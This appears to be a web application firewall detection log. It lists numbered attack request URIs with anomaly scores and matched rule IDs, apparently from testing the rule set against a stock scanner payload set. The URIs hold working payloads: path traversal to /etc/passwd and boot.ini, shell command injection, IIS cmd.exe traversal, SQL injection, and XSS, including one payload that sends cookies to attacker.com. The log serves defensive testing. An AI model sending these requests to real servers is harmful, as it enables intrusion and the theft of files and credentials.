Packet [364]	Uri [/_private/shopping_cart.mdb]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [365]	Uri [/cgi-bin/cached_feed.cgi?../../../.%2B/etc/passwd]	PLmin [1]	Score [30]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [366]	Uri [/cgi-bin/search/search.cgi?keys=%2A&prc=any&catigory=../../../../../..]	PLmin [1]	Score [35]	Nattacks [2]	[930100]	[930110]
Packet [367]	Uri [/cgi-bin/Web_Store/web_store.cgi?page=../../../etc/passwd%00html]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [368]	Uri [/cgi-bin/shopper.cgi?newpage=../../..//etc/passwd.html]	PLmin [1]	Score [40]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [369]	Uri [/cgi-bin/shop.cgi/page=../../../etc/passwd]	PLmin [1]	Score [5]	Nattacks [1]	[930100]
Packet [372]	Uri [/cgi-bin/survey/survey.cgi?survey_name=%27ls%7Cmore]	PLmin [1]	Score [5]	Nattacks [1]	[932150]
Packet [373]	Uri [/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28%2A.mdb%29&dsn=Evil%2Bsamples%2Bfrom%2Bmicrosoft&dbq=..%2F..%2Fwwwroot%2Fevil.html&newdb=CREATE_DB]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [398]	Uri [/null.htw?CiWebHitsFile=/filename.htm&CiRestriction=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3C/SCRIPT%3E%22]	PLmin [1]	Score [20]	Nattacks [4]	[920440]	[941100]	[941110]	[941160]
Packet [399]	Uri [/null.htw?CiWebHitsFile=/filename.htm&CiRestriction=%22%3CSCRIPT%3Ealert%28%26quot%3B%26%23x20%3BXSS%26%23x20%3BTest%26%23x20%3BSuccessful%26quot%3B%29%3E%3C/SCRIPT%3E%22]	PLmin [1]	Score [20]	Nattacks [4]	[920440]	[941100]	[941110]	[941160]
Packet [400]	Uri [/null.htw?CiWebHitsFile=/filename.htm&CiRestriction=%22%3CSCRIPT%3Eperl%20-e%20%27print%20%22%3CIMG%20SRC=java%5C0script:alert%28%5C%22XSS%5C%22%29%3E%22%3B%27%20%3E%20out%3C/SCRIPT%3E%22]	PLmin [1]	Score [35]	Nattacks [7]	[920440]	[941100]	[941110]	[941140]	[941160]	[941170]	[941210]
Packet [401]	Uri [/null.htw?CiWebHitsFile=/filename.htm&CiRestriction=%22%3CSCRIPT%3Eperl%20-e%20%27print%22%3CSCR%5C0IPT%3Ealert%28%5C%22XSS%5C%22%29%3C/SCR%5C0IPT%3E%22%3B%27%20%3E%20out%3C/SCRIPT%3E%22]	PLmin [1]	Score [20]	Nattacks [4]	[920440]	[941100]	[941110]	[941160]
Packet [402]	Uri [/null.htw?CiWebHitsFile=/filename.htm&CiRestriction=%22%3CSCRIPT%3Ea=/XSS/alert%28a.source%29%3C/SCRIPT%3E%22]	PLmin [1]	Score [20]	Nattacks [4]	[920440]	[941100]	[941110]	[941160]
Packet [403]	Uri [/null.htw?CiWebHitsFile=/filename.htm&CiRestriction=%22%3CSCRIPT%3Evar%20a=%22%24ENV%7BQUERY_STRING%7D%22%3B%3C/SCRIPT%3E%22]	PLmin [1]	Score [20]	Nattacks [4]	[920440]	[941100]	[941110]	[941160]
Packet [404]	Uri [/null.htw?CiWebHitsFile=/filename.htm&CiRestriction=%22%3CSCRIPT%3Evar%20a=%22%5C%5C%22%3Balert%28%27XSS%27%29%3B//%22%3B%3C/SCRIPT%3E%22]	PLmin [1]	Score [20]	Nattacks [4]	[920440]	[941100]	[941110]	[941160]
Packet [405]	Uri [/null.htw?CiWebHitsFile=/filename.htm&CiRestriction=%22%3CSCRIPT%3E%3C%21--%23exec%20cmd=%22/bin/echo%27%3CSCR%27%22--%3E%3C%21--%23exec]	PLmin [1]	Score [35]	Nattacks [7]	[920440]	[932150]	[932160]	[941100]	[941110]	[941160]	[941180]
Packet [406]	Uri [/null.htw?CiWebHitsFile=/filename.htm&CiRestriction=%22%3CSCRIPT%3Ea=%22%3E%22SRC=%22http://ha.ckers.org/xss.js%22%3E%3C/SCRIPT%3E%22]	PLmin [1]	Score [20]	Nattacks [4]	[920440]	[941100]	[941110]	[941160]
Packet [407]	Uri [/null.htw?CiWebHitsFile=/filename.htm&CiRestriction=%22%3CSCRIPT%3E%3C%21--%23exec%20cmd=%22/bin/ls%22--%3E%3C/SCRIPT%3E%22]	PLmin [1]	Score [30]	Nattacks [6]	[920440]	[932160]	[941100]	[941110]	[941160]	[941180]
Packet [408]	Uri [/null.htw?CiWebHitsFile=/filename.htm&CiRestriction=%22%3CSCRIPT%3E%3C%21--%23exec%20cmd=%22cat%20/etc/passwd%22--%3E%3C/SCRIPT%3E%22]	PLmin [1]	Score [35]	Nattacks [7]	[920440]	[930120]	[932160]	[941100]	[941110]	[941160]	[941180]
Packet [409]	Uri [/null.htw?CiWebHitsFile=/filename.htm&CiRestriction=%22%3CSCRIPT%3E%3C%21--%23exec%20cmd=%22cat%20/etc/passwd%22--%3E%3C/SCRIPT%3E%22]	PLmin [1]	Score [35]	Nattacks [7]	[920440]	[930120]	[932160]	[941100]	[941110]	[941160]	[941180]
Packet [410]	Uri [/null.htw?CiWebHitsFile=/filename.htm&CiRestriction=%22%3CSCRIPT%3Edocument.write%28%22%3Cimg%20src=http://attacker.com/%22%20%2B%20document.cookie%20%2B%20%22%3E%22%29%3C/SCRIPT%3E%22]	PLmin [1]	Score [25]	Nattacks [5]	[920440]	[941100]	[941110]	[941160]	[941180]
Packet [411]	Uri [/cgi-bin/pagelog.cgi?name=../../../../../tmp/archivo.txt]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [412]	Uri [/cgi-bin/pagelog.cgi?name=../../../../../tmp/archivo.log]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [414]	Uri [/scripts/iisadmin/ism.dll?http/dir]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [416]	Uri [/scripts/archivo.bat%22%2B&%2Bdir%2Bc:/%2B.com]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [417]	Uri [/scripts/autoexec.bat%22%2B&%2Bdir%2Bc:/windows/system32%2B.com]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [423]	Uri [/scripts/..%c1%1c../..%c1%1c../mssql7/install/pubtext.bat%22%2B&%2Bdir%2Bc:%5C%2B.exe]	PLmin [1]	Score [5]	Nattacks [1]	[930100]
Packet [424]	Uri [/scripts/file.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir%20C:]	PLmin [1]	Score [5]	Nattacks [1]	[930100]
Packet [425]	Uri [/scripts/georgi.asp/..%C1%9C..%C1%9C..%C1%9Carchivo.ext]	PLmin [1]	Score [5]	Nattacks [1]	[930100]
Packet [433]	Uri [/iissamples/exair/search/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	PLmin [1]	Score [35]	Nattacks [3]	[920440]	[930100]	[930110]
Packet [434]	Uri [/iissamples/exair/search/search.idq?CiTemplate=../../../../../../../../../../winnt/win.ini]	PLmin [1]	Score [35]	Nattacks [3]	[920440]	[930100]	[930110]
Packet [435]	Uri [/cgi-bin/gbook/gbook.cgi?_MAILTO=oops%3Bps%20-ax%7Cmail%20haha%40yaho.com&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&_EMAIL=fwe%40yaho.com&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few]	PLmin [1]	Score [5]	Nattacks [1]	[932105]
Packet [436]	Uri [/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [437]	Uri [/cgi-bin/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [438]	Uri [/cgi-bin/cgiforum.pl?thesection=../../../../../../etc/passwd%00]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [439]	Uri [/campas?%0acat%0a/etc/passwd%0a]	PLmin [1]	Score [25]	Nattacks [5]	[921150]	[930120]	[932100]	[932105]	[932160]
Packet [440]	Uri [/quikstore.cfg]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [441]	Uri [/cgi-bin/quikstore.cfg]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [442]	Uri [/cgi-bin/info2www?x=../../../../../../../../bin/mail]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [443]	Uri [/support/common.php?f=0&ForumLang=../../../../../../../etc/resolv.conf]	PLmin [1]	Score [35]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [444]	Uri [/support/common.php?f=0&ForumLang=../../../../../../../etc/hosts]	PLmin [1]	Score [35]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [445]	Uri [/support/common.php?f=0&ForumLang=../../../../../../../etc/hosts.equiv]	PLmin [1]	Score [35]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [446]	Uri [/cgi-bin/htmlscript?../../../../../../../etc/resolv.conf]	PLmin [1]	Score [20]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [447]	Uri [/cgi-bin/htmlscript?../../../../../../../etc/hosts]	PLmin [1]	Score [20]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [448]	Uri [/cgi-bin/htmlscript?../../../../../../../etc/hosts.equiv]	PLmin [1]	Score [20]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [449]	Uri [/cgi-bin/jj?pwd=SDGROCKS&pop=0&name=rudi&adr=elder4&phone=4523534%7E/bin/ls]	PLmin [1]	Score [5]	Nattacks [1]	[932160]
Packet [452]	Uri [/cgi-bin/wguest.exe?template=c:%5Cboot.ini]	PLmin [1]	Score [5]	Nattacks [1]	[930120]
Packet [454]	Uri [/scripts/convert.bas?../../setuplog.txt]	PLmin [1]	Score [15]	Nattacks [2]	[930100]	[930110]
Packet [456]	Uri [/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd]	PLmin [1]	Score [10]	Nattacks [2]	[930120]	[932160]
Packet [457]	Uri [/cgi-bin/faxsurvey?/bin/cat%20/etc/hosts]	PLmin [1]	Score [10]	Nattacks [2]	[930120]	[932160]
Packet [458]	Uri [/cgi-bin/faxsurvey?/bin/cat%20/etc/resolv.conf]	PLmin [1]	Score [10]	Nattacks [2]	[930120]	[932160]
Packet [460]	Uri [/cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=%7C%20echo%20%22Content-Type:%20text%2Fhtml%22%3Becho%20%22%22%20%3B%20id%00]	PLmin [1]	Score [20]	Nattacks [3]	[920270]	[932100]	[932110]
Packet [463]	Uri [/cgi-bin/loadpage.cgi?user_id=id&file=.%7C./.%7C./.%7C./.%7C./.%7C./etc/passwd%00.html]	PLmin [1]	Score [25]	Nattacks [4]	[920270]	[930120]	[932105]	[932160]
Packet [464]	Uri [/cgi-bin/loadpage.cgi?user_id=id&file=.%7C./.%7C./.%7C./.%7C./.%7C./etc/hosts%00.html]	PLmin [1]	Score [15]	Nattacks [2]	[920270]	[930120]
Packet [465]	Uri [/cgi-bin/loadpage.cgi?user_id=id&file=.%7C./.%7C./.%7C./.%7C./.%7C./etc/resolv.conf%00.html]	PLmin [1]	Score [15]	Nattacks [2]	[920270]	[930120]
Packet [466]	Uri [/iisadmpwd/aexp2.htr]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [467]	Uri [/iisadmpwd/aexp2b.htr]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [468]	Uri [/iisadmpwd/aexp3.htr]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [469]	Uri [/iisadmpwd/aexp4.htr]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [470]	Uri [/iisadmpwd/aexp4b.htr]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [471]	Uri [/iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c%2Bdir]	PLmin [1]	Score [15]	Nattacks [2]	[930100]	[930110]
Packet [472]	Uri [/iisadmpwd/..%255c..%255cwinnt/system32/cmd.exe?/c%2Bdir]	PLmin [1]	Score [5]	Nattacks [1]	[930100]
Packet [473]	Uri [/iisadmpwd/..%255c..%255cwinnt/system32/ipconfig.exe]	PLmin [1]	Score [5]	Nattacks [1]	[930100]
Packet [474]	Uri [/carbo.dll?icatcommand=..%5C..%5Cwinnt%5Cupgrade.txt&catalogname=catalog]	PLmin [1]	Score [15]	Nattacks [2]	[920440]	[930100]
Packet [475]	Uri [/carbo.dll?icatcommand=..%5C..%5Cwindows%5Cupgrade.txt&catalogname=catalog]	PLmin [1]	Score [15]	Nattacks [2]	[920440]	[930100]
Packet [476]	Uri [/carbo.dll?icatcommand=..%5C..%5Cwinnt%5Cntbtlog.txt&catalogname=catalog]	PLmin [1]	Score [15]	Nattacks [2]	[920440]	[930100]
Packet [477]	Uri [/carbo.dll?icatcommand=..%5C..%5Cwindows%5Cversion.txt&catalogname=catalog]	PLmin [1]	Score [15]	Nattacks [2]	[920440]	[930100]
Packet [480]	Uri [/_vti_bin/_vti_aut/author.dll]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [481]	Uri [/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [483]	Uri [/technote/main.cgi/documento?down_num=2&board=kleadata1&command=down_load&filename=sanction.pdf.txt%7Cls%7C]	PLmin [1]	Score [5]	Nattacks [1]	[932100]
Packet [487]	Uri [/cgi-bin/bsguest.cgi?email=x%3Bls]	PLmin [1]	Score [5]	Nattacks [1]	[932100]
Packet [488]	Uri [/cgi-bin/bslist.cgi?email=x%3Bls]	PLmin [1]	Score [5]	Nattacks [1]	[932100]
Packet [489]	Uri [/newsdesk.cgi?t=../../../../../../../../../../etc/passwd]	PLmin [1]	Score [40]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [490]	Uri [/newsdesk.cgi?t=../../../../../../../../../../etc/host.allow]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [491]	Uri [/.nsf/../winnt/win.ini]	PLmin [1]	Score [10]	Nattacks [2]	[920440]	[930100]
Packet [492]	Uri [/cgi-bin/bbs_forum.cgi?forum=%3Cforum_name%3E&read=../../../../../../etc/hosts.allow]	PLmin [1]	Score [40]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [493]	Uri [/cgi-bin/bbs_forum.cgi?forum=%3Cforum_name%3E&read=../../../../../../etc/hosts]	PLmin [1]	Score [40]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [494]	Uri [/cgi-bin/bbs_forum.cgi?forum=%3Cforum_name%3E&read=../../../../../../etc/passwd]	PLmin [1]	Score [45]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [496]	Uri [/inc/sendmail.inc]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [501]	Uri [/cgi-bin/view-source?../../../../../../../etc/passwd]	PLmin [1]	Score [25]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [502]	Uri [/cgi-bin/view-source?../../../../../../../etc/hosts]	PLmin [1]	Score [20]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [503]	Uri [/cgi-bin/view-source?../../../../../../../etc/host.equiv]	PLmin [1]	Score [15]	Nattacks [2]	[930100]	[930110]
Packet [508]	Uri [/mall_log_files/order.log]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [510]	Uri [/wp-includes/feed.php?ix=phpinfo%28%29%3B]	PLmin [1]	Score [5]	Nattacks [1]	[933160]
Packet [511]	Uri [/wp-includes/theme.php?iz=cat%20/etc/passwd]	PLmin [1]	Score [10]	Nattacks [2]	[930120]	[932160]
Packet [512]	Uri [/wp-includes/theme.php?iz=cat%20/etc/hosts]	PLmin [1]	Score [5]	Nattacks [1]	[930120]
Packet [514]	Uri [/scripts/iisadmin/bdir.htr??d:%5Cwebs]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [515]	Uri [/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=%3Bcat%20/etc/passwd%7C&CODE=PHOLD]	PLmin [1]	Score [15]	Nattacks [3]	[930120]	[932100]	[932160]
Packet [516]	Uri [/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=%3Bcat%20/etc/hosts%7C&CODE=PHOLD]	PLmin [1]	Score [10]	Nattacks [2]	[930120]	[932100]
Packet [517]	Uri [/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=%3Bcat%20/etc/host.allow%7C&CODE=PHOLD]	PLmin [1]	Score [5]	Nattacks [1]	[932100]
Packet [518]	Uri [/GetFile.cfm?FT=Text&FST=Plain&FilePath=C:%5Cboot.ini]	PLmin [1]	Score [5]	Nattacks [1]	[930120]
Packet [519]	Uri [/cfdocs/exampleapp/email/getfile.cfm?filename=c:%5Cboot.ini]	PLmin [1]	Score [5]	Nattacks [1]	[930120]
Packet [520]	Uri [/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/passwd%00]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [521]	Uri [/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/hosts%00]	PLmin [1]	Score [55]	Nattacks [4]	[920270]	[930100]	[930110]	[930120]
Packet [522]	Uri [/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/host.allow%00]	PLmin [1]	Score [50]	Nattacks [3]	[920270]	[930100]	[930110]
Packet [524]	Uri [/cgi-bin/apexec.pl?template=/etc/passwd%%0000.html]	PLmin [1]	Score [23]	Nattacks [4]	[920220]	[920270]	[930120]	[932160]
Packet [525]	Uri [/cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [526]	Uri [/cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/hosts%00.html&passurl=/category/]	PLmin [1]	Score [55]	Nattacks [4]	[920270]	[930100]	[930110]	[930120]
Packet [527]	Uri [/cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../../etc/host.allow%00.html&passurl=/category/]	PLmin [1]	Score [50]	Nattacks [3]	[920270]	[930100]	[930110]
Packet [528]	Uri [/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999%2Bunion%2Bselect%2Bshlogid%2Bas%2Bmestname]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [529]	Uri [/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999%2Bunion%2Bselect%2Bshlpswd%2Bas%2Bmestname]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [530]	Uri [/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999%2Bunion%2Bselect%2Bshchaans%2Bas%2Bmestname]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [531]	Uri [/ncommerce3/ExecMacro/macro.d2w/%0a%0a]	PLmin [1]	Score [5]	Nattacks [1]	[921190]
Packet [534]	Uri [/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [535]	Uri [/cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [536]	Uri [/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/hosts]	PLmin [1]	Score [35]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [537]	Uri [/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd]	PLmin [1]	Score [40]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [538]	Uri [/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/hosts]	PLmin [1]	Score [35]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [539]	Uri [/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../bin/pwd]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [540]	Uri [/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd]	PLmin [1]	Score [40]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [541]	Uri [/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/host.allow]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [542]	Uri [/way-board/way-board.cgi?db=/etc/passwd%00]	PLmin [1]	Score [20]	Nattacks [3]	[920270]	[930120]	[932160]
Packet [543]	Uri [/way-board.cgi?db=/etc/passwd%00]	PLmin [1]	Score [20]	Nattacks [3]	[920270]	[930120]	[932160]
Packet [544]	Uri [/cgi-bin/way-board.cgi?db=/etc/passwd%00]	PLmin [1]	Score [20]	Nattacks [3]	[920270]	[930120]	[932160]
Packet [545]	Uri [/ROADS/cgi-bin/search.pl?form=/etc/passwd%00]	PLmin [1]	Score [20]	Nattacks [3]	[920270]	[930120]	[932160]
Packet [546]	Uri [/pals-cgi?palsAction=restart&documentName=/etc/passwd]	PLmin [1]	Score [10]	Nattacks [2]	[930120]	[932160]
Packet [547]	Uri [/pals-cgi?palsAction=restart&documentName=cat%20/etc/passwd]	PLmin [1]	Score [10]	Nattacks [2]	[930120]	[932160]
Packet [549]	Uri [/isapi/tstisapi.dll?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]	PLmin [1]	Score [5]	Nattacks [1]	[920440]
Packet [551]	Uri [/cgi-bin/store.cgi?StartID=../etc/hosts%00.html]	PLmin [1]	Score [25]	Nattacks [3]	[920270]	[930110]	[930120]
Packet [552]	Uri [/cgi-bin/store.cgi?StartID=../etc/%00.html]	PLmin [1]	Score [20]	Nattacks [2]	[920270]	[930110]
Packet [553]	Uri [/cgi-bin/store.cgi?StartID=../etc/passwd%00.html]	PLmin [1]	Score [30]	Nattacks [4]	[920270]	[930110]	[930120]	[932160]
Packet [554]	Uri [/cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [556]	Uri [/cgi-bin/sendtemp.pl?templ=/etc/hosts]	PLmin [1]	Score [5]	Nattacks [1]	[930120]
Packet [557]	Uri [/cgi-bin/sendtemp.pl?templ=/etc/passwd]	PLmin [1]	Score [10]	Nattacks [2]	[930120]	[932160]
Packet [564]	Uri [/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts]	PLmin [1]	Score [35]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [565]	Uri [/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls%20%7C]	PLmin [1]	Score [45]	Nattacks [4]	[930100]	[930110]	[932150]	[932160]
Packet [566]	Uri [/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd]	PLmin [1]	Score [40]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [567]	Uri [/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../../../../bin/cat%20ustorekeeper.pl%7C]	PLmin [1]	Score [40]	Nattacks [3]	[930100]	[930110]	[932160]
Packet [568]	Uri [/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [569]	Uri [/cgi-bin/talkback.cgi?article=../../../../../../../../etc/hosts%00&action=view&matchview=1]	PLmin [1]	Score [55]	Nattacks [4]	[920270]	[930100]	[930110]	[930120]
Packet [570]	Uri [/cgi-bin/nph-maillist.pl?emailaddress=90112%40bigbrother.pl%3Bls%09-al%7Cmail%09mister_r%40ceres%2Eugr%2Ees]	PLmin [1]	Score [5]	Nattacks [1]	[932100]
Packet [571]	Uri [/cgi-bin/nph-maillist.pl?emailaddress=90112%40bigbrother.pl%3Bls%09-al%7Cmail%09mr_r%40hotmail%2Ecom]	PLmin [1]	Score [5]	Nattacks [1]	[932100]
Packet [572]	Uri [/cgi-bin/nph-maillist.pl?emailaddress=90112%40bigbrother.pl%3Bls%09-al%7Cmail%09bandido%40ugr%2Ees]	PLmin [1]	Score [5]	Nattacks [1]	[932100]
Packet [573]	Uri [/cgi-bin/nph-maillist.pl?emailaddress=90112%40bigbrother.pl%3Bls%09-al%7Cmail%09la_rata%40hotmail%2Ees]	PLmin [1]	Score [5]	Nattacks [1]	[932100]
Packet [577]	Uri [/cgi-bin/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [578]	Uri [/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [579]	Uri [/cgi-bin/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/hosts%00]	PLmin [1]	Score [55]	Nattacks [4]	[920270]	[930100]	[930110]	[930120]
Packet [580]	Uri [/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/hosts%00]	PLmin [1]	Score [55]	Nattacks [4]	[920270]	[930100]	[930110]	[930120]
Packet [582]	Uri [/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [583]	Uri [/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/hosts%00]	PLmin [1]	Score [55]	Nattacks [4]	[920270]	[930100]	[930110]	[930120]
Packet [584]	Uri [/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/hosts.allow%00]	PLmin [1]	Score [55]	Nattacks [4]	[920270]	[930100]	[930110]	[930120]
Packet [585]	Uri [/cgi-bin/cal_make.pl?p0=../../../../../../../../../../etc/passwd%00]	PLmin [1]	Score [60]	Nattacks [5]	[920270]	[930100]	[930110]	[930120]	[932160]
Packet [587]	Uri [/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd]	PLmin [1]	Score [25]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [588]	Uri [/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd]	PLmin [1]	Score [25]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [589]	Uri [/cgi-bin/a1stats/a1disp2.cgi?../../../../../../../etc/passwd]	PLmin [1]	Score [25]	Nattacks [4]	[930100]	[930110]	[930120]	[932160]
Packet [590]	Uri [/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/hosts]	PLmin [1]	Score [20]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [591]	Uri [/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/hosts]	PLmin [1]	Score [20]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [592]	Uri [/cgi-bin/a1stats/a1disp2.cgi?../../../../../../../etc/hosts]	PLmin [1]	Score [20]	Nattacks [3]	[930100]	[930110]	[930120]
Packet [593]	Uri [/cgi-bin/a1stats/a1disp.cgi?%7Cecho%20%3Ea1admin.txt%7C]	PLmin [1]	Score [10]	Nattacks [2]	[932100]	[932110]
Packet [594]	Uri [/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c%2Bwin.ini]	PLmin [1]	Score [15]	Nattacks [2]	[930100]	[930110]
Packet [595]	Uri [/dir/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c%2Bdir]	PLmin [1]	Score [5]	Nattacks [1]	[930100]
Packet [596]	Uri [/dir/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c%2Bwin.ini]	PLmin [1]	Score [5]	Nattacks [1]	[930100]
